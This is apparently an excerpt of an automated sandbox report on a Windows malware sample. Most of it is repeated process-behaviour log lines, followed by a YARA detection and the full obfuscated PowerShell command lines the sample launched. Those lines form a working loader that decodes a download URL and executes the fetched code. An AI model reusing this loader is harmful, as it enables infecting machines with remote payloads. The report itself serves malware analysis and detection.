            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5236Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4646Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7626Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2053Jump to behavior
            Source: C:\Windows\System32\wscript.exe TID: 7316Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5852Thread sleep count: 7626 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep count: 2053 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5660Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wscript.exe, 00000000.00000003.1692717937.00000197493C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692650287.0000019749440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692872277.00000197493E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692993480.0000019749440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692178610.0000019749440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692650287.000001974944C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692178610.000001974944C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692993480.000001974944C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3019849567.000001D06F232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: amsi64_8096.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8096, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6160, type: MEMORYSTR
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$PadleJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'cygnid hemiteratic orthodiagraphy217 malleolar lovreglens aflbsledninger sagsaktens traadrullerne nonscalar nondeclaratory yawnups abet226 stammefejderne33 avitaminosis aabenlyses fusionsmusikken earthworms kursusmodulet bolledejene rollefag eyras windowshopping usr disboscation91 cygnid hemiteratic orthodiagraphy217 malleolar lovreglens aflbsledninger sagsaktens traadrullerne nonscalar nondeclaratory yawnups abet226 stammefejderne33 avitaminosis aabenlyses fusionsmusikken earthworms kursusmodulet bolledejene rollefag eyras windowshopping usr disboscation91';if (${host}.currentculture) {$clairaudience++;}function trosfllen($gendigtende){$statshemmelighedernes=$gendigtende.length-$clairaudience;$prehensible='substri';$prehensible+='ng';for( $bilkberne195=2;$bilkberne195 -lt $statshemmelighedernes;$bilkberne195+=3){$cygnid+=$gendigtende.$prehensible.invoke( $bilkberne195, $clairaudience);}$cygnid;}function extensionalism($medullitis){ & ($impotens) ($medullitis);}$czardas=trosfllen ' omvrom,zbaiaalr.la,a.e/st5no.ko0ge br(bawini mnp,d,domew esre pnc tf, sp1ta0 ,. e0s.;pn ,w ,iskns 6en4 l;go trxsk6fo4 ;f, frguvh :ma1l 2,a1.n.pa0re)b, ge,e.ecankwioh / g2n.0an1st0.y0t,1.b0.s1m. cfvei rr ieenflyoprxso/co1ty2s,1 a. t0 d ';$preassuring=trosfllen ' auh skoeoprfa-nea,ugk,e ncot.k ';$lovreglens=trosfllen 'd hhjtoct .pacsos:tr/sa/hod srtei,fvskes .gigl,o.iohygaxltueb,. dcreo cmer/fiup.c i?beeanxa.pskoa,rvet i=bidp ocaw.in ols.o qaovdtr&loimad m=ko1 ey s-unsborarwmey t9p.w spatbox eode0seaa.cus2 fnjiv agan8 ja ,2,ea .u .meonbitri3bevsgqunyj cp ';$unhomologic=trosfllen ' >te ';$impotens=trosfllen 'peiunestxum ';$aarigt='traadrullerne';$databasemodellerne = trosfllen 'b etrck.h,nomy k%u.a ypt pkvdchahatbraul% s\ od,vesim,eo,rcl.r.iaretknieasolistndigno. is ppb.ico w,&bj&ki e.euncx h .ofo at h ';extensionalism (trosfllen ' s$,ngh,lviokubsoa lm : bgrit.gratcrhg.agetu.c ah.r=.h(zacflm kdj, pa/ eceu e.$andbratet ,asnb aa fskle amr oeld.eeorll,l,kea rmonfoehe)lu ');extensionalism (trosfllen 'ki$r gosl aoprbs atul.r:k.mt.a,tlsyluneauo tlskafars,= ,$mels on v er ,e rg .l eet nc,sjr.mis ,pscl pifot v( s$meuern ch .oadmurotel.koh,g,biflcdi)co ');extensionalism (trosfllen ' p[b.nhaet,t .. .s .eferb,vfoi.tcnoet,povoliichnsltbimrea kn daokg.iesarc,] .:.i:disklespcseu irsliintuny.ip cr.eo ,t so fcf,o lte .l=bu se[ nbeefutal.besatesocfrumar oielt ay.op kr.nosutveosackiocol ut fy.ip.eega]ls: o:s.tpaldosmo1ps2 , ');$lovreglens=$malleolar[0];$fjedrene= (trosfllen ' o$.lgkul.eoetbd.asila.:esafond,i psdee.lindkmyo intrif.cgu= ,n pe.aw h-afojebtoj kefocp.t , desspy essntheebimul.,dn res.tre.luwspeprbspc ,le,ifoen nv t');$fjedrene+=$bigthatch[1];extensionalism ($fjedrene);extensionalism (trosfllen 'do$uha,rnfiidesbeeprifrkvrostnsai .cir.lehdue ,agidate,orimsbu[eu$stp srdeetuasysbosdiuprr di tnr gso]cr=s $sucstzrha,mrjod fa.esva ');$padle
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'cygnid hemiteratic orthodiagraphy217 malleolar lovreglens aflbsledninger sagsaktens traadrullerne nonscalar nondeclaratory yawnups abet226 stammefejderne33 avitaminosis aabenlyses fusionsmusikken earthworms kursusmodulet bolledejene rollefag eyras windowshopping usr disboscation91 cygnid hemiteratic orthodiagraphy217 malleolar lovreglens aflbsledninger sagsaktens traadrullerne nonscalar nondeclaratory yawnups abet226 stammefejderne33 avitaminosis aabenlyses fusionsmusikken earthworms kursusmodulet bolledejene rollefag eyras windowshopping usr disboscation91';if (${host}.currentculture) {$clairaudience++;}function trosfllen($gendigtende){$statshemmelighedernes=$gendigtende.length-$clairaudience;$prehensible='substri';$prehensible+='ng';for( $bilkberne195=2;$bilkberne195 -lt $statshemmelighedernes;$bilkberne195+=3){$cygnid+=$gendigtende.$prehensible.invoke( $bilkberne195, $clairaudience);}$cygnid;}function extensionalism($medullitis){ & ($impotens) ($medullitis);}$czardas=trosfllen ' omvrom,zbaiaalr.la,a.e/st5no.ko0ge br(bawini mnp,d,domew esre pnc tf, sp1ta0 ,. e0s.;pn ,w ,iskns 6en4 l;go trxsk6fo4 ;f, frguvh :ma1l 2,a1.n.pa0re)b, ge,e.ecankwioh / g2n.0an1st0.y0t,1.b0.s1m. cfvei rr ieenflyoprxso/co1ty2s,1 a. t0 d ';$preassuring=trosfllen ' auh skoeoprfa-nea,ugk,e ncot.k ';$lovreglens=trosfllen 'd hhjtoct .pacsos:tr/sa/hod srtei,fvskes .gigl,o.iohygaxltueb,. dcreo cmer/fiup.c i?beeanxa.pskoa,rvet i=bidp ocaw.in ols.o qaovdtr&loimad m=ko1 ey s-unsborarwmey t9p.w spatbox eode0seaa.cus2 fnjiv agan8 ja ,2,ea .u .meonbitri3bevsgqunyj cp ';$unhomologic=trosfllen ' >te ';$impotens=trosfllen 'peiunestxum ';$aarigt='traadrullerne';$databasemodellerne = trosfllen 'b etrck.h,nomy k%u.a ypt pkvdchahatbraul% s\ od,vesim,eo,rcl.r.iaretknieasolistndigno. is ppb.ico w,&bj&ki e.euncx h .ofo at h ';extensionalism (trosfllen ' s$,ngh,lviokubsoa lm : bgrit.gratcrhg.agetu.c ah.r=.h(zacflm kdj, pa/ eceu e.$andbratet ,asnb aa fskle amr oeld.eeorll,l,kea rmonfoehe)lu ');extensionalism (trosfllen 'ki$r gosl aoprbs atul.r:k.mt.a,tlsyluneauo tlskafars,= 